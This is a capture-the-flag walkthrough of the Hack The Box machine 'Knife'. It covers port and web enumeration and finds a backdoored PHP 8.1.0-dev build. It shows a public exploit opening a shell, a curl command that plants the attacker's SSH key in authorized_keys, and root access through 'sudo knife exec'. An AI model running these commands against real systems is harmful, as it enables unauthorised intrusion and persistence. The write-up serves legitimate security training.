HTB: Knife

Enumeration

I run nmap and found the ports 22 and 80 open.

┌─[]─[user@parrot]─[~]
└──╼ ports=$(nmap -p- -T4 -Pn -n 10.129.132.165 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
┌─[user@parrot]─[~]
└──╼ echo $ports 
22,80
┌─[user@parrot]─[~]
└──╼ nmap -sC -sV -Pn -p$ports 10.129.132.165
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 14:36 BST
Nmap scan report for 10.129.132.165
Host is up (0.049s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Because the port 80 is open, I check if there is a web hosted on the machine. There is a web, but doesn’t have anything interesting, just an empty static web.

A directory scan with gobuster reveals one directory, “server-status”, but still nothing interesting.

I use nikto to scan the web and found something interesting, the “X-Powered-By” header is using PHP/8.1.0-dev, that php version was released with a backdoor…

┌─[user@parrot]─[~]
└──╼ nikto -h 10.129.132.165
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.129.132.165
+ Target Hostname:    10.129.132.165
+ Target Port:        80
+ Start Time:         2022-05-07 14:44:33 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ 6544 items checked: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2022-05-07 14:49:59 (GMT1) (326 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

User flag

With a quick search I found two exploits on GitHub, exploit-1 and exploit-2, I downloaded the first one because it will directly open a reverse shell on the target and seems more simple to use, perfect for my objective.

I cloned the repository and run the script. It worked perfectly, I took the flag and continue with the priv esc.

┌─[user@parrot]─[~/htb/knife/exploits/Exploit-PHP-8.1.0]
└──╼ ./php_8.1_rce.sh http://10.129.132.165
Checking if host is vulnerable...

Vulnerable --> PHP/8.1.0
[+] Spawning shell

$ whoami
james
$ ls -l /home/james
total 4
-r-------- 1 james james 33 May  7 11:56 user.txt
$ 

Root flag

First I upgraded the shell just for commodity reasons. To accomplish this I will generate an ssh key and add it to the “authorized_keys” file of the james user.

# create the ssh key and host a web server
┌─[user@parrot]─[~/htb/knife/files]
└──╼ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/user/.ssh/id_rsa): ./id_rsa
[...]
┌─[user@parrot]─[~/htb/knife/files]
└──╼ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

# on the target download and add the key to the "authorized_keys" file
$ curl http://10.10.14.93:8080/id_rsa.pub > /home/james/.ssh/authorized_keys
$ 

# connect to the target using ssh
┌─[]─[user@parrot]─[~/htb/knife/files]
└──╼ ssh -i id_rsa james@10.129.132.165
james@knife:~$ whoami
james
james@knife:~$ 

I upload linpeas.sh to the machine for a quick enumeration, and quickly found several vulnerabilities:

  1. Sudo version is vulnerable to priv esc.
  2. Vulnerable to CVE-2021-4034 (priv esc).
  3. We can run the command “/usr/bin/knife” with sudo.
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.31

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

The first two are very easy to exploit (just download the exploit and run it), so I will be exploring the third one.

I search on google and found that the program knife actually exists.

I search for it on GTFOBins and discover an easy way to priv esc taking advantage of that we can execute it with sudo.

james@knife:~$ sudo knife exec -E 'exec "/bin/sh"'
# whoami
root
# ls -l /root/root.txt
-r-------- 1 root root 33 May  7 11:56 /root/root.txt
# 

And that’s it! I’m root.

Scroll to Top